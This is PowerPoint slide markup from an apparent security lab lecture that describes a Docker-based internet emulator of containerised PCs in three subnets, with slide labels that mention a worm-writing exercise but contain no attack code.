          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Internet Emulator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3BAEA9F-7BD6-5F5A-89EB-C8AF74AC9793}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="6597580" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The pre-built emulator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The lab uses multiple containers to mimic multiple PCs in a network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multiple PCs are in three groups (subnet) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>each group has 5 PCs, one router</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Groups are inter-connected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The configuration of the containers is defined in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>docker-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>compose.yml</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Start the emulator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Oval 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{966D4C95-3F50-602A-D73D-4110E0461D02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9132513" y="20955"/>
            <a:ext cx="1363579" cy="1029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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Oval 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50CA6CBE-71BA-2797-D8BD-BC1B653B4A0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10666449" y="1327011"/>
            <a:ext cx="1363579" cy="10297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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Oval 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8FA2A37-6933-87F2-DE37-FAFE81FC6FFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7501820" y="1336765"/>
            <a:ext cx="1363579" cy="102978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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Internet, intranet, network, business, cloud, communication, weather icon -  Download on Iconfinder">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80154DAF-1E4D-209B-BF36-A8F081D61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857" y="1481455"/>
            <a:ext cx="720893" cy="72089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969F4E8-F97C-32ED-9196-ACC23F9301B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="4"/>
            <a:endCxn id="1026" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9814303" y="1050735"/>
            <a:ext cx="1" cy="4307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246AF0-F88E-C36A-7507-9698A4E5252C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1026" idx="1"/>
            <a:endCxn id="8" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8865399" y="1841902"/>
            <a:ext cx="588458" cy="97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E18DD36-062E-077C-71A8-E46067481569}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="7" idx="2"/>
            <a:endCxn id="1026" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10174750" y="1841901"/>
            <a:ext cx="49169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Yellow computer icon (png symbol)">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFA1A5A8-B31B-0F9F-9F27-3DE0E8294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113" y="4105703"/>
            <a:ext cx="673770" cy="6737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Yellow computer icon (png symbol)">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA1EB631-5577-392A-BF1F-F4B0B99E7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673" y="5027914"/>
            <a:ext cx="673770" cy="6737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Yellow computer icon (png symbol)">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1B36E66-EEFE-470F-6F39-9F6041A4A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558" y="3400450"/>
            <a:ext cx="673770" cy="6737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Yellow computer icon (png symbol)">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F615F16-43D1-E9A7-E23C-74852E495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324" y="4112707"/>
            <a:ext cx="673770" cy="6737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Yellow computer icon (png symbol)">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE900B5D-6160-F9C6-32AC-3635EEDE9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405" y="5027914"/>
            <a:ext cx="673770" cy="6737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fi router - Free communications icons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88638A89-9125-7E75-3928-C730B0DA6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123" y="4242386"/>
            <a:ext cx="673770" cy="6737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EB7B627-03A8-680C-D598-785A8870772C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10121623" y="3151837"/>
            <a:ext cx="905504" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>group 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Arrow: Right 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C625DDD-600A-14CC-B198-945EFD1DA48C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="3172182">
            <a:off x="8248005" y="2503284"/>
            <a:ext cx="756147" cy="318087"/>
          </a:xfrm>
          <a:prstGeom prs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24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4AD2E0-1D28-A08A-8BDB-7ECEC4D164B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1259840" y="2407920"/>
            <a:ext cx="2113280" cy="12293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Docker Compose</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>(YAML File)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74D5035A-E278-70AD-69DF-19ECBDF321E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4551680" y="2306320"/>
            <a:ext cx="1280160" cy="53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Dockerfile</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{900D1D04-8232-894E-4070-92C795DBF4C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4551680" y="3272155"/>
            <a:ext cx="1280160" cy="53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Dockerfile</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFEDC886-F412-6DFC-645E-59BD0A92CA5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7264400" y="2133600"/>
            <a:ext cx="1280160" cy="30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Container</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C76EF421-63B2-6E74-DC0E-A36745A3A4AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7264400" y="2441257"/>
            <a:ext cx="1280160" cy="53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httpd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED4CA5DF-17B6-9A99-515B-2177FCA2F6A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7264400" y="3134994"/>
            <a:ext cx="1280160" cy="307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Container</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D15E78E4-D866-DC96-2678-3D10E033DFEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7264400" y="3442651"/>
            <a:ext cx="1280160" cy="538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mysql</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 2" descr="Software application - Free seo and web icons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF10BD34-85A3-4C32-E81D-84B4EEA0F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0" y="2227897"/>
            <a:ext cx="1503680" cy="150368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87012D90-867A-2FCE-92B9-EA659D503ED3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:endCxn id="7" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3545840" y="2575560"/>
            <a:ext cx="1005840" cy="404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00004AE-FDE7-CDC1-6F95-5B2C5159D60B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:endCxn id="8" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3576320" y="3022600"/>
            <a:ext cx="975360" cy="51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618FF3-995B-65F7-6679-E99C28607815}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5831840" y="2529840"/>
            <a:ext cx="1432560" cy="4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370E87-7057-1F60-2218-BCF6DB9DB532}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5831840" y="3541395"/>
            <a:ext cx="1361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503882-F654-0884-0780-C87F27B5D3FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="10" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8544560" y="2710497"/>
            <a:ext cx="944880" cy="134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E1AFA7-5838-C920-6879-2E0ED6831076}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="12" idx="3"/>
            <a:endCxn id="13" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8544560" y="2979737"/>
            <a:ext cx="843280" cy="73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F7607A-10F5-9302-09D7-E695E2EEEC94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9608925" y="3711891"/>
            <a:ext cx="1157689" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="278834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58F9A5-5842-2CE4-BD5A-2300D3C16E42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="75150" y="1031624"/>
            <a:ext cx="8337002" cy="1051651"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C314F8C-E424-2D1E-58F5-D38F2CBBBE1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="88445" y="2083275"/>
            <a:ext cx="11347163" cy="2728196"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6828A141-DB0C-B62C-BF58-C16328416472}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="88445" y="4834080"/>
            <a:ext cx="7011008" cy="823031"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C843846E-5247-A14D-DAE8-63681B77AEF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="88445" y="5679720"/>
            <a:ext cx="7483488" cy="876376"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D91229E-3FF1-8EA4-8B71-923841CB4B8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75150" y="650988"/>
            <a:ext cx="1589859" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Obtain lab files</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="204711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032D64-10A4-70B6-143D-7BA435B8FAFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="877194" y="1901084"/>
            <a:ext cx="7132938" cy="2446232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E16D2FAC-4DB9-5087-151E-F178ED91024A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8750968" y="3128211"/>
            <a:ext cx="1578253" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mimic internet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FA16A61-102D-BC0B-4DB1-F96BBC724C1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7186863" y="3128211"/>
            <a:ext cx="156410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8BA9A7-0B52-C83B-1BBC-41E145596BAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="877194" y="1531752"/>
            <a:ext cx="1723998" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Folders we need</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E8466EC-DFF3-043D-057E-7DBF1D231D89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8750967" y="3661654"/>
            <a:ext cx="2770310" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>visualize attacked machines</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Arrow Connector 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{862E3B64-EF65-8515-8F09-4DA48B56EA11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="3" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6168189" y="3370939"/>
            <a:ext cx="2582778" cy="475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126AC5-916F-4365-577A-C4E7334B6A7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8750967" y="4311855"/>
            <a:ext cx="2560381" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker writes the worm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
